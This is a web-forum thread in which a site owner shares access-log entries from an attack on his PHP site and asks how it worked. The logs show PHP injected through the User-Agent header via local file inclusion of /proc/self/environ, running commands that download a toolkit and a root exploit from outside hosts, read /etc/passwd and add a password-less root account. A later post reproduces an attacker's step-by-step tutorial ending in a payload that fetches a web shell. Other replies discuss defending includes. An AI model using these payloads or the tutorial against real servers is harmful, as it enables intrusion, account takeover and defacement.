Site hacked, found this in access-logs

  • camperjohn
  • Guru
  • Guru
  • User avatar
  • Posts: 1127
  • Loc: San Diego

Post 3+ Months Ago

About two weeks ago, someone hacked my front page on one of my older websites. Aparently, someone got in by using the User-Agent as PHP code. This must have been done with curl or any simple program.

Now why would the user agent string, be executed as html/PHP? And why does he echo garbage strings in the PHP?

// Normal request
Code: [ Select ]
205.157.206.219 - - [16/Nov/2009:18:05:49 -0500] "GET /blahblah.html HTTP/1.1" 200 144 "http://www.unknowably.com/Bmw_Rear_Window.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"


// This is what I found in my access logs - notice the PHP is placed in the user agent (browser type)
Code: [ Select ]
201.6.154.39 - - [16/Nov/2009:16:37:11 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 54929 "-" "<? echo 'WSRsTn8e'; ?> <? phpinfo(); ?> <? echo 'TQaN6TK7'; ?>"
201.6.154.39 - - [16/Nov/2009:16:37:11 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 54929 "-" "<? echo 'WSRsTn8e'; ?> <? phpinfo(); ?> <? echo 'TQaN6TK7'; ?>"201.6.154.39 - - [16/Nov/2009:16:37:13 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12575 "-" "<? $h=popen(\"echo $((77*77))\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?>"
201.6.154.39 - - [16/Nov/2009:16:37:11 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 54929 "-" "<? echo 'WSRsTn8e'; ?> <? phpinfo(); ?> <? echo 'TQaN6TK7'; ?>"201.6.154.39 - - [16/Nov/2009:16:37:18 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12733 "-" "<? echo 'Jm7oYPxw'; ?> <? $h=popen(\"uname -a\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'fZfdMjNd'; ?>"
201.6.154.39 - - [16/Nov/2009:16:38:05 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12666 "-" "<? echo 'J9es49Qm'; ?> <? $h=popen(\"uptime\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'UJMtRe29'; ?>"
201.6.154.39 - - [16/Nov/2009:16:38:12 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12968 "-" "<? echo 'Rl53gsAz'; ?> <? $h=popen(\"cat /etc/hosts\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'Lmb1NYyI'; ?>"
201.6.154.39 - - [16/Nov/2009:16:39:41 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12868 "-" "<? echo '3K4JgvX7'; ?> <? $h=popen(\"uname -a ; uptime ; id\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo '6odTEzvh'; ?>"
201.6.154.39 - - [16/Nov/2009:16:44:18 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12594 "-" "<? echo 'IoSwzc0h'; ?> <? $h=popen(\"wget http://info-e.com.mx/~toylag/toolz/2009.tar\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo '3cMfW7XL'; ?>"
201.6.154.39 - - [16/Nov/2009:16:44:22 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12955 "-" "<? echo 'XBninGnT'; ?> <? $h=popen(\"ls\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'YEMt22x2'; ?>"
201.6.154.39 - - [16/Nov/2009:16:44:54 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12959 "-" "<? echo '5MKMYWBk'; ?> <? $h=popen(\"tar xvf 2009.tar\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'BFtHr8Qn'; ?>"
201.6.154.39 - - [16/Nov/2009:16:45:03 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12594 "-" "<? echo '0n3mWagt'; ?> <? $h=popen(\"./linux-sendpage\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'VEr5g9wj'; ?>"
201.6.154.39 - - [16/Nov/2009:16:45:06 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12651 "-" "<? echo 'Bl6HmVeh'; ?> <? $h=popen(\"id\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'HS7jzVdH'; ?>"
201.6.154.39 - - [16/Nov/2009:16:45:57 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12968 "-" "<? echo 'JYNsPmBZ'; ?> <? $h=popen(\"cat /etc/hosts\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'RMpMfe7h'; ?>"
201.6.154.39 - - [16/Nov/2009:16:46:08 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 16068 "-" "<? echo 'KkMbCOsL'; ?> <? $h=popen(\"cat /etc/passwd\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'ISiPyLMX'; ?>"
201.6.154.39 - - [16/Nov/2009:16:50:01 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12588 "-" "<? echo 'C8eJuF9D'; ?> <? $h=popen(\"echo jocampo:x:0:0::/:/bin/bash >> /etc/passwd; echo jocampo:::::::: >> /etc/shadow\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo '3gQFvfqB'; ?>"
201.6.154.39 - - [16/Nov/2009:16:50:08 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12643 "-" "<? echo '0jHPKqWZ'; ?> <? $h=popen(\"passwd jocampo\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'oCijfcxG'; ?>"
201.6.154.39 - - [16/Nov/2009:16:50:18 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 16013 "-" "<? echo 'BK0ee6Bc'; ?> <? $h=popen(\"cat /etc/passwd\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'ic6R1qB6'; ?>"
201.6.154.39 - - [16/Nov/2009:16:51:08 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 13009 "-" "<? echo 'BJVk1UaG'; ?> <? $h=popen(\"ls\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'WItW5pXx'; ?>"
201.6.154.39 - - [16/Nov/2009:16:52:45 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12643 "-" "<? echo 'ya4nvi21'; ?> <? $h=popen(\"wget http://www.freewebtown.com/hacketoso/Defaced/defaced.txt\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'tiUecmLy'; ?>"
201.6.154.39 - - [16/Nov/2009:16:52:47 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12972 "-" "<? echo 'GfYgW1I6'; ?> <? $h=popen(\"ls\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'H6q9rX12'; ?>"
201.6.154.39 - - [16/Nov/2009:18:06:05 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 1452 "-" "<? echo 'Ye4LlBJx'; ?> <? $h=popen(\"wget http://www.freewebtown.com/hacketoso/Defaced/force.htm\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'WED82Vm9'; ?>"
  1. 201.6.154.39 - - [16/Nov/2009:16:37:11 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 54929 "-" "<? echo 'WSRsTn8e'; ?> <? phpinfo(); ?> <? echo 'TQaN6TK7'; ?>"
  2. 201.6.154.39 - - [16/Nov/2009:16:37:11 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 54929 "-" "<? echo 'WSRsTn8e'; ?> <? phpinfo(); ?> <? echo 'TQaN6TK7'; ?>"201.6.154.39 - - [16/Nov/2009:16:37:13 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12575 "-" "<? $h=popen(\"echo $((77*77))\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?>"
  3. 201.6.154.39 - - [16/Nov/2009:16:37:11 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 54929 "-" "<? echo 'WSRsTn8e'; ?> <? phpinfo(); ?> <? echo 'TQaN6TK7'; ?>"201.6.154.39 - - [16/Nov/2009:16:37:18 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12733 "-" "<? echo 'Jm7oYPxw'; ?> <? $h=popen(\"uname -a\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'fZfdMjNd'; ?>"
  4. 201.6.154.39 - - [16/Nov/2009:16:38:05 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12666 "-" "<? echo 'J9es49Qm'; ?> <? $h=popen(\"uptime\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'UJMtRe29'; ?>"
  5. 201.6.154.39 - - [16/Nov/2009:16:38:12 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12968 "-" "<? echo 'Rl53gsAz'; ?> <? $h=popen(\"cat /etc/hosts\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'Lmb1NYyI'; ?>"
  6. 201.6.154.39 - - [16/Nov/2009:16:39:41 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12868 "-" "<? echo '3K4JgvX7'; ?> <? $h=popen(\"uname -a ; uptime ; id\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo '6odTEzvh'; ?>"
  7. 201.6.154.39 - - [16/Nov/2009:16:44:18 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12594 "-" "<? echo 'IoSwzc0h'; ?> <? $h=popen(\"wget http://info-e.com.mx/~toylag/toolz/2009.tar\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo '3cMfW7XL'; ?>"
  8. 201.6.154.39 - - [16/Nov/2009:16:44:22 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12955 "-" "<? echo 'XBninGnT'; ?> <? $h=popen(\"ls\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'YEMt22x2'; ?>"
  9. 201.6.154.39 - - [16/Nov/2009:16:44:54 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12959 "-" "<? echo '5MKMYWBk'; ?> <? $h=popen(\"tar xvf 2009.tar\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'BFtHr8Qn'; ?>"
  10. 201.6.154.39 - - [16/Nov/2009:16:45:03 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12594 "-" "<? echo '0n3mWagt'; ?> <? $h=popen(\"./linux-sendpage\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'VEr5g9wj'; ?>"
  11. 201.6.154.39 - - [16/Nov/2009:16:45:06 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12651 "-" "<? echo 'Bl6HmVeh'; ?> <? $h=popen(\"id\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'HS7jzVdH'; ?>"
  12. 201.6.154.39 - - [16/Nov/2009:16:45:57 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12968 "-" "<? echo 'JYNsPmBZ'; ?> <? $h=popen(\"cat /etc/hosts\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'RMpMfe7h'; ?>"
  13. 201.6.154.39 - - [16/Nov/2009:16:46:08 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 16068 "-" "<? echo 'KkMbCOsL'; ?> <? $h=popen(\"cat /etc/passwd\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'ISiPyLMX'; ?>"
  14. 201.6.154.39 - - [16/Nov/2009:16:50:01 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12588 "-" "<? echo 'C8eJuF9D'; ?> <? $h=popen(\"echo jocampo:x:0:0::/:/bin/bash >> /etc/passwd; echo jocampo:::::::: >> /etc/shadow\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo '3gQFvfqB'; ?>"
  15. 201.6.154.39 - - [16/Nov/2009:16:50:08 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12643 "-" "<? echo '0jHPKqWZ'; ?> <? $h=popen(\"passwd jocampo\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'oCijfcxG'; ?>"
  16. 201.6.154.39 - - [16/Nov/2009:16:50:18 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 16013 "-" "<? echo 'BK0ee6Bc'; ?> <? $h=popen(\"cat /etc/passwd\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'ic6R1qB6'; ?>"
  17. 201.6.154.39 - - [16/Nov/2009:16:51:08 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 13009 "-" "<? echo 'BJVk1UaG'; ?> <? $h=popen(\"ls\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'WItW5pXx'; ?>"
  18. 201.6.154.39 - - [16/Nov/2009:16:52:45 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12643 "-" "<? echo 'ya4nvi21'; ?> <? $h=popen(\"wget http://www.freewebtown.com/hacketoso/Defaced/defaced.txt\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'tiUecmLy'; ?>"
  19. 201.6.154.39 - - [16/Nov/2009:16:52:47 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12972 "-" "<? echo 'GfYgW1I6'; ?> <? $h=popen(\"ls\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'H6q9rX12'; ?>"
  20. 201.6.154.39 - - [16/Nov/2009:18:06:05 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 1452 "-" "<? echo 'Ye4LlBJx'; ?> <? $h=popen(\"wget http://www.freewebtown.com/hacketoso/Defaced/force.htm\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'WED82Vm9'; ?>"


I already fixed this to not allow a file with .. to be included. But still, what is proc/self/environ, and why does it execute code from this request?
  • Anonymous
  • Bot
  • No Avatar
  • Posts: ?
  • Loc: Ozzuland
  • Status: Online

Post 3+ Months Ago

  • camperjohn
  • Guru
  • Guru
  • User avatar
  • Posts: 1127
  • Loc: San Diego

Post 3+ Months Ago

http://rstcenter.com/forum/16406-shell- ... p-step.rst
  • joebert
  • Fart Bubbles
  • Genius
  • User avatar
  • Posts: 13502
  • Loc: Florida

Post 3+ Months Ago

Ouch.

Interesting link you have there. I'm afraid to click it because that site doesn't look very trustworthy, and I'm afraid to post the explaination it has here so people don't have to risk going there because they seem like the type who would attack me for trying to protect others.
  • camperjohn
  • Guru
  • Guru
  • User avatar
  • Posts: 1127
  • Loc: San Diego

Post 3+ Months Ago

>>>>>>>>>>>>>>> Shell via LFI - proc/self/environ method <<<<<<<<<<<<<<<
>>>>>>>>>>>>>>> Author : SirGod <<<<<<<<<<<<<<<
>>>>>>>>>>>>>>> http://www.insecurity-ro.org <<<<<<<<<<<<<<<
>>>>>>>>>>>>>>> http://www.h4cky0u.org <<<<<<<<<<<<<<<
>>>>>>>>>>>>>>> sirgod08@gmail.com <<<<<<<<<<<<<<<

1 - Introduction
2 - Finding LFI
3 - Checking if proc/self/environ is accessible
4 - Injecting malicious code
5 - Access our shell
6 - Shoutz

>> 1 - Introduction

In this tutorial I show you how to get a shell on websites using Local File Inclusion vulnerabilities and
injection malicious code in proc/self/environ.Is a step by step tutorial.

>> 2 - Finding LFI

- Now we are going to find a Local File Inclusion vulnerable website.So we found our target,lets check it.

http://www.website.com/view.php?page=contact.php

- Now lets replace contact.php with ../ so the URL will become

http://www.website.com/view.php?page=../

and we got an error

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

big chances to have a Local File Inclusion vulnerability.Let's go to next step.

- Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request :

http://www.website.com/view.php?page=../../../etc/passwd

we got error and no etc/passwd file

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

so we go more directories up

http://www.website.com/view.php?page=../../../../../etc/passwd

we succesfully included the etc/passwd file.

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

>> 3 - Checking if proc/self/environ is accessible

- Now lets see if proc/self/environ is accessible.We replace etc/passwd with proc/self/environ

http://www.website.com/view.php?page=../../../../../proc/self/environ

If you get something like

DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at http://www.website.com Port 80

proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible or the OS is FreeBSD.

>> 4 - Injecting malicious code

- Now let's inject our malicious code in proc/self/environ.How we can do that?We can inject our code in User-Agent HTTP Header.
Use Tamper Data Addon for Firefox to change the User-Agent.Start Tamper Data in Firefox and request the URL :

http://www.website.com/view.php?page=../../../../../proc/self/environ

Choose Tamper and in User-Agent filed write the following code :

<?system('wget http://hack-bay.com/Shells/gny.txt -O shell.php');?>

Then submit the request.

Our command will be executed (will download the txt shell from http://hack-bay.com/Shells/gny.txt and will save it as shell.php in the
website directory) through system(), and our shell will be created.If don't work,try exec() because system() can be disabled on the webserver from php.ini.

>> 5 - Access our shell

- Now lets check if our malicous code was successfully injected.Lets check if the shell is present.

http://www.website.com/shell.php

Our shell is there.Injection was succesfully.

>> 6 - Shoutz

Shoutz to all members of http://www.insecurity-ro.org and http://www.h4cky0u.org.
  • joebert
  • Fart Bubbles
  • Genius
  • User avatar
  • Posts: 13502
  • Loc: Florida

Post 3+ Months Ago

Sometimes I wonder if you've got people lining up around the block to attack you, John. lol

I guess the important lesson here is to jail your includes. Not just by looking for the /. characters in the front either. consider a path like this.

Code: [ Select ]
innocent/looking/../../../not-so-innocent


I wonder if that would resolve anywhere.
  • joebert
  • Fart Bubbles
  • Genius
  • User avatar
  • Posts: 13502
  • Loc: Florida

Post 3+ Months Ago

I forgot to mention, the first thing I thought of when I started reading this thread, was that perhaps a traffic statistics page somewhere wasn't htmlencoding the PHP markers in the static HTML pages that were being saved, and then maybe the PHP interpreter was setup to parse *.html files as PHP.
  • camperjohn
  • Guru
  • Guru
  • User avatar
  • Posts: 1127
  • Loc: San Diego

Post 3+ Months Ago

I thought I did jail the includes, I even did a file_exists in that folder. But this was on an older website (+6 years) and the dot (.) was a valid character, so the combo ../../ wasn't trapped.

Anyway, glad the hacker just changed the front page, and didn't delete the website or more.

Funny thing is, he could have just changed my google adsense ID number to skim ads, and make $50+/- a day and I probably wouldn't have noticed for a long time. If he changed it to skim 100% of the ads, I would have been wtf, but he could have rand(0,5) == 0 and taken 20% of my income for a long time and I may have never noticed...
  • joebert
  • Fart Bubbles
  • Genius
  • User avatar
  • Posts: 13502
  • Loc: Florida

Post 3+ Months Ago

It's funny you mention the ads. I had a Godaddy account compromised some time ago and they did exactly that with the ads, but they replaced the entire Adsense code with some sort of malware link and an image the same size as the Adsense.

I didn't realize it for 6 months because the genius applied it in template files I didn't even use. I guess they were looking for pages that don't get much traffic to stay unde the radar, and stay under the radar they did.
  • joebert
  • Fart Bubbles
  • Genius
  • User avatar
  • Posts: 13502
  • Loc: Florida

Post 3+ Months Ago

Now that you mention it, it would be awesome if Googles Webmaster Tools had a way to link Adsense accounts with Webmaster tools and you could monitor Adsense ids that appear on the site.

I guess that wouldn't help much with the problem I had where the Adsense was removed completely, though if it lead to a dive in impressions I suppose it would be cause for concern and lead to seeing it like you said.
  • camperjohn
  • Guru
  • Guru
  • User avatar
  • Posts: 1127
  • Loc: San Diego

Post 3+ Months Ago

Yes if my ads took a dive to 0, then I would figure it out. But it someone made it only 30% less than I would have just got back to work to jump my traffic again. And I would have inadvertantly helped his traffic!
  • genux
  • Graduate
  • Graduate
  • User avatar
  • Posts: 106
  • Loc: UK

Post 3+ Months Ago

very cool post camperjohn about how to hack.. really enjoyed reading it.
  • sheva249
  • Novice
  • Novice
  • sheva249
  • Posts: 20

Post 3+ Months Ago

Thanks for the resourceful info. also liked very much the tut.

Post Information

  • Total Posts in this topic: 12 posts
  • Users browsing this forum: No registered users and 4 guests
  • You cannot post new topics in this forum
  • You cannot reply to topics in this forum
  • You cannot edit your posts in this forum
  • You cannot delete your posts in this forum
  • You cannot post attachments in this forum
 
 

© 1998-2014. Ozzu® is a registered trademark of Unmelted, LLC.